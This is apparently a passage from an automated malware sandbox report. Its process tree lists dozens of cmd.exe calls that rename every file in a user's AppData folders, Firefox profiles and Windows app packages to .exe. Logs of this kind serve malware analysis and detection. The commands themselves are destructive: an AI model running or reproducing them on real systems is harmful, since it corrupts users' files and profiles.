        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Virtualized\*.*" "*.exe"
        6⤵
        
        PID:4752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\3MWDO42T\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FZW7MNDS\*.*" "*.exe"
        6⤵
        
        PID:1852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KN6FN23Q\*.*" "*.exe"
        6⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KQHBP8GN\*.*" "*.exe"
        6⤵
        
        PID:2096
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ESE\*.*" "*.exe"
        6⤵
        
        PID:2292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Low\*.*" "*.exe"
        6⤵
        
        PID:556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\*.*" "*.exe"
        6⤵
        
        PID:2400
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\*.*" "*.exe"
        6⤵
        
        PID:896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\*.*" "*.exe"
        6⤵
        
        PID:644
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\*.*" "*.exe"
        6⤵
        
        PID:2904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\*.*" "*.exe"
        6⤵
        
        PID:3124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\*.*" "*.exe"
        6⤵
        
        PID:3696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"
        6⤵
        
        PID:384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Backup\*.*" "*.exe"
        6⤵
        
        PID:2836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:3740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"
        6⤵
        
        PID:4872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3jtla600.Admin\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\*.*" "*.exe"
        6⤵
        
        PID:2792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\cache2\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\safebrowsing\*.*" "*.exe"
        6⤵
        
        PID:4604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\settings\*.*" "*.exe"
        6⤵
        
        PID:4268
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\startupCache\*.*" "*.exe"
        6⤵
        
        PID:2568
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\thumbnails\*.*" "*.exe"
        6⤵
        
        PID:1544
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\cache2\doomed\*.*" "*.exe"
        6⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\cache2\entries\*.*" "*.exe"
        6⤵
        
        PID:3476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\settings\main\*.*" "*.exe"
        6⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\settings\main\ms-language-packs\*.*" "*.exe"
        6⤵
        
        PID:1852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"
        6⤵
        
        PID:1508
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\74uts9gp.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"
        6⤵
        
        PID:408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\*.*" "*.exe"
        6⤵
        
        PID:4624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:2212
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3148
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:3344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1008
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:3892
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:1256
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:4740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.OneDriveSync_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.UI.Xaml.CBS_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:4532
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:3328
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3056
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:2880
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4548
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:692
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:2616
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:5112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3160
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4584
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:4068
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\*.*" "*.exe"
        6⤵
        
        PID:1760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\*.*" "*.exe"
        6⤵
        
        PID:3224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows_ie_ac_001\*.*" "*.exe"
        6⤵
        
        PID:3856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:3108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:4976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:4872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:3552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:1724
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:464
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:5016
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:1200
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:1696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:4536
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\*.*" "*.exe"
        6⤵
        
        PID:4604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\*.*" "*.exe"
        6⤵
        
        PID:3100
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:1068
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:1576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:2108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:3096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5084
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:3376
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:2728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:1940
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:4600
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:2400
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:1976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:2472
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:2124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:2928
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:3148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:2336
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:1108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:3468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:4652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:3552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:3828
